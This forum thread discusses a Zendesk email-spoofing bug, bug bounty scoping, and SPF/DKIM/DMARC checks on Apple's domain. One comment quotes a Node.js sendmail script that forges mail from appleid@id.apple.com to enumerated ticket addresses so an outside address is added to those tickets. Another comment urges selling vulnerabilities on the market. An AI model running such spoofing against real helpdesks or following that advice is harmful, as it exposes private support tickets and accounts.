In a past life I was involved in a bug bounty program. I don't think the reasoning is as detailed.

When you stand up a bug bounty program you get a ton of "I opened developer tools, edited the js on your page, and now the page does something bad" submissions. "I can spoof some email headers and send an email to myself that looks like it is coming from you" isn't something I've specifically seen due to some weird details about my bounty program but it is something I would absolutely expect for many programs to see.

So you need a mechanism to reject this stuff. But if that mechanism is just "triage says this is dumb" you get problems. People scream at you for having their nonsense bug rejected. People submit dozens of very slightly altered "bugs" to try to say "you rejected the last one for reason X but this one does Y." So you create a general policy: anything involving email spoofing is out of scope.

So then a real bug ends up in front of the triage person. They are tired and busy and look at the report and see "oh this relies on email spoofing, close as out of scope." Sucks.

I think that Zendesk's follow up here is crap. They shouldn't be criticizing the author for writing about this bug. But I do very much understand how things end up with a $0 payout for the initial report.

Right, but I would be really shocked if Zendesk's internal email handler was doing any SPF/DKIM/DMARC validation at all. So even if a domain has DMARC set up, Zendesk is probably ignoring it. Which is probably pretty reasonable given how rare DMARC reject/quarantine has been historically

Are Google and Apple not doing proper SPF/DMARC/DKIM? I think they probably are - but this attack worked anyway.

Zendesk wasn't validating the email senders.

Apple and Google weren’t involved as email sender addresses.

Read the repro steps again:

> Create an Apple account with support@company.com email and request a verification code, Apple sends verification code from appleid@id.apple.com to support@company.com and Zendesk automatically creates a ticket

It's a clever attack.

I agree with your point, but that email's not the best example because it would have passed SPF/DMARC/DKIM. It's a step or two later that involved sending a spoofed email from appleid@id.apple.com :

  const sendmail = require('sendmail')();
  
  // Assuming the ticket you created in step #2 was assigned a ticket ID of #453 
  // verification email landed somewhere near there
  const range = [448, 457];
  for (let i = range[0]; i < range[1]; i++) {
      // Send spoofed emails from Apple to Zendesk
      sendmail({
          from: 'appleid@id.apple.com',
          to: `support+id${i}@company.com`,
          cc: 'daniel@wearehackerone.com',
          subject: '',
          html: 'comment body',
      }, function (err, reply) {
          console.log(err && err.stack)
          console.dir(reply)
      });
  };

This is exactly my point: if Apple has SPF/DKIM/DMARC configured correctly, then Zendesk should be validating the email sender. That they didn't is technically an SPF/DKIM/DMARC issue - a bug in Zendesk - but it is not a customer misconfiguration issue.

You don't want to too strict technical validations on your helpdesk contact points, though. It's supposed to be reachable when things are broken. So it's not as easy as just reconfiguring incoming mail relays. You might need separate domains for extended validation, or a reliable (!) way to relay authentication results to those mail endpoints that need it. Come to think of it, presenting email validation results to helpdesk staff might be a good idea in general.

if someone's reading this thread: yes, apple does have dmarc / spf

    $ dig id.apple.com TXT +short
    "v=spf1 include:_spf-txn.apple.com include:_spf-mkt.apple.com include:_spf.apple.com include:icloud.com ~all"
    $ dig _dmarc.id.apple.com TXT +short
    "v=DMARC1; p=reject; rua=mailto:d@rua.agari.com; ruf=mailto:d@ruf.agari.com;"

They also seem to have DKIM. To find out, first we need an authoritative name server for id.apple.com:

  $ dig +short id.apple.com NS
  ns1-235.akam.net.
  ns1-45.akam.net.
  asia3.akam.net.
  asia2.akam.net.
  eur5.akam.net.
  usw2.akam.net.
  usw6.akam.net.
  use1.akam.net.

We pick an arbitrary nameserver and see if the _domainkey subdomain gives NXDOMAIN or NORERROR:

  $ dig +noall +comments +norecurse @ns1-235.akam.net _domainkey.id.apple.com TXT | grep HEADER
  ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12521

Good, it gives NOERROR, which indicates the existence of subdomains. Just to be sure, we check some other arbitrary non-existing subdomain, to see if it gives NXDOMAIN as it should:

  $ dig +noall +comments +norecurse @ns1-235.akam.net zojglgrcqk.id.apple.com TXT | grep HEADER
  ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 5653

Since it gives the expected NXDOMAIN, this strongly indicates that there are DNS records present on subdomains of “_domainkey.id.apple.com”; i.e. DKIM keys.

(Of course, if you have ever recieved e-mail from an address @id.apple.com, you would see the selector name in the DKIM signature header, and could look up the corresponding DKIM record directly. The above method is for when you don’t have access to that.)

And it’s still out of scope for the HackerOne bug bounty program.

Future hackers, take note. If vulnerabilities you discover have any chance of being misinterpreted as "out of scope" by some bureaucrat at HackerOne, even though they're obviously applicable and dangerous, sell them on the market instead.

Got a -1 on this comment. Must mean that I’m wrong and that it’s become part of the scope now!

Maybe someone wants to post a link?

maybe because the issue is not about apple's dns records, so the vulnerability is in scope. One could argue the issue is in zendesk's feature of adding people with an email.

I wonder how redirects from support@company.com to zendesk work? if it's via MX records pointing to zendesk that it's zendesk's fault for not checking DMARC If it's another type of redirect then yes, you can blame customers for not verifying DMARC